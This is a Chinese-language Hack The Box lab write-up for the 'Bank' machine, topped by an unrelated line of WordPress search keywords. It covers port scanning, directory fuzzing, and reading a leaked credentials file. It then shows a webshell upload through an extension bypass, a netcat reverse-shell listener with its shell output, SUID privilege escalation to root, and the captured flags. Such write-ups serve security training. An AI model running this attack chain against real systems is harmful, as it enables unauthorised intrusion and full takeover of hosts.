建立网站有哪些步骤,wordpress 后台添加文章 没编辑功能,做设计适合关注的网站,wordpress更改图标目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
提取出靶机TCP开放端口
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用curl对域名进行访问…目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
提取出靶机TCP开放端口
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用curl对域名进行访问
使用浏览器访问该域名
边界突破
使用ffuf对该域名进行路径FUZZ
访问balance-transfer接口可见大量.acc文件
点击右上角的Size按钮可对文件大小进行升序排列
通过上述凭证登录后在左侧可见Support栏目
使用Yakit构造请求包发送Webshell
本地侧nc开始监听
权限提升
查看靶机系统内存在的用户
查找当前系统内的SUID文件 连接至HTB服务器并启动靶机 靶机IP10.10.10.29 分配IP10.10.16.13 信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.29 -r 1-65535 --ulimit 5000 | tee res 提取出靶机TCP开放端口
ports$(grep syn-ack res | awk -F / {print $1} | paste -s -d ,) ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# grep syn-ack res | awk -F / {print $1} | paste -s -d , 22,53,80 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# ports$(grep syn-ack res | awk -F / {print $1} | paste -s -d ,) ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# echo $ports 22,53,80 使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn 10.10.10.29 使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --scriptvuln -O -Pn 10.10.10.29 使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.29 将靶机IP与bank.htb域名进行绑定
sed -i 1i 10.10.10.29 bank.htb /etc/hosts ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# sed -i 1i 10.10.10.29 bank.htb /etc/hosts ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# head /etc/hosts -n 1 10.10.10.29 bank.htb 使用curl对域名进行访问
curl -I http://bank.htb ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://bank.htb HTTP/1.1 302 Found Date: Tue, 07 Jan 2025 09:12:29 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.21 Set-Cookie: HTBBankAuth1ukl795lkhp59fqphdlk8s7gb0; path/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check0, pre-check0 Pragma: no-cache location: login.php Content-Type: text/html 使用浏览器访问该域名 边界突破
使用ffuf对该域名进行路径FUZZ
ffuf -u http://bank.htb/FUZZ -w ../dictionary/Entire-Dir.txt -t 200 访问balance-transfer接口可见大量.acc文件 点击右上角的Size按钮可对文件大小进行升序排列 点击查看这个与其他.acc文件大小不一样的文件 得到凭证 名称Christos Christopoulos 邮箱chrisbank.htb 密码!##HTBB4nkP4ssw0rd!## 通过上述凭证登录后在左侧可见Support栏目 点击后可见该页支持文件上传 键盘按CtrlU查看该页原码 由该页注释可知.htb文件可充当.php文件进行解析
使用Yakit构造请求包发送Webshell 在My Tickets栏目中可见文件成功上传 本地侧nc开始监听
rlwrap -cAr nc -lvnp 1425
直接点击Click Here访问Webshell文件本地侧nc收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# rlwrap -cAr nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.13] from (UNKNOWN) [10.10.10.29] 45632 Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 13:09:56 up 3:20, 0 users, load average: 0.37, 0.09, 0.03 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid33(www-data) gid33(www-data) groups33(www-data) /bin/sh: 0: cant access tty; job control turned off $ whoami www-data $ id uid33(www-data) gid33(www-data) groups33(www-data) 提升TTY
python3 -c import pty;pty.spawn(/bin/bash) 权限提升
查看靶机系统内存在的用户
cat /etc/passwd 当前用户权限可以直接查看chris下的flag文件 www-databank:/$ find / -name user.txt -type f 2/dev/null find / -name user.txt -type f 2/dev/null /home/chris/user.txt www-databank:/$ cat /home/chris/user.txt cat /home/chris/user.txt 8fc44025442af344df63cad1c33e35c8 查找当前系统内的SUID文件
find / -perm -4000 -type f -ls 2/dev/null 直接运行/var/htb/bin/emergency文件即可提权至root用户 www-databank:/$ /var/htb/bin/emergency /var/htb/bin/emergency # id id uid33(www-data) gid33(www-data) euid0(root) groups0(root),33(www-data) # whoami whoami root 在/root目录下找到root.txt文件 # find / -name root.txt -type f find / -name root.txt -type f /root/root.txt # cat /root/root.txt cat /root/root.txt 38e39916caa580e4ffaee0a6379444c9
